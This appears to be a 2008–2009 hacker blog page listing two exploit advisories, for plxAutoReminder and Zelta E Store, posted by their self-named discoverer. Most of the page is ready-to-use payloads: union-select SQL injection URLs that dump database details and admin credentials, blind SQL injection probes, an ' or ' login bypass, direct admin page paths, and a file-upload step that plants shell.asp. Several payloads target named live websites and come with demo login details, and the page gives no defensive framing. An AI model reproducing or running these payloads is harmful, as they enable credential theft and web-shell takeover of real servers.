"The Devil Is the Voice Inside You; Listen to That Voice"

-Zorlu BUĞRAHAN-


Monday, 5 January 2009

plxAutoReminder 3.7 (id) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7663



Discovered By: ZoRLu

You must log in to the site.

R-Sql

z0rlu.blogspot.com/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

for demo:

user: trt-turk@hotmail.com

pass: salla1

http://www.plxwebdev.com/demos/autoreminder/members.php?s=newar&edmode=1&id=999999999+union+select+1,2,3,4,concat(user(),0x3a,version(),0x3a,database()),6,7,8,9,10,11,12,13,14,15,16

Wednesday, 17 December 2008

Zelta E Store (RFU/BYPASS/R-SQL/B-SQL) Multiple Vulnerabilities

link: http://www.milw0rm.com/exploits/7494

link: http://packetstormsecurity.org/0812-exploits/zelta-rfusql.txt

Discovered By: ZoRLu


exp for demo: (R-SQL)

user: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminlogin,3,4+from+admin

pass: http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+union+select+1,adminpass,3,4+from+admin


exp for demo: (B-SQL)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=1 (true)

http://joineazy.com/store/productsofcat.asp?p=1&category_id=17+and+1=100 (false)


exp for demo: (auth bypass)

http://joineazy.com/members/login.asp

username: trt-turk@hotmail.com

pass: ' or '


exp for demo: (admin bypass)

http://joineazy.com/embadmin/admin_main.asp

http://joineazy.com/embadmin/site_setup.asp

http://joineazy.com/embadmin/main_baseimage.asp


exp for demo: (RFU)

First, register on the site.

Log in to the site, edit your pictures and select your shell.asp.

Go to your shell.asp:

http://joineazy.com/members/member_pictures/shell.asp
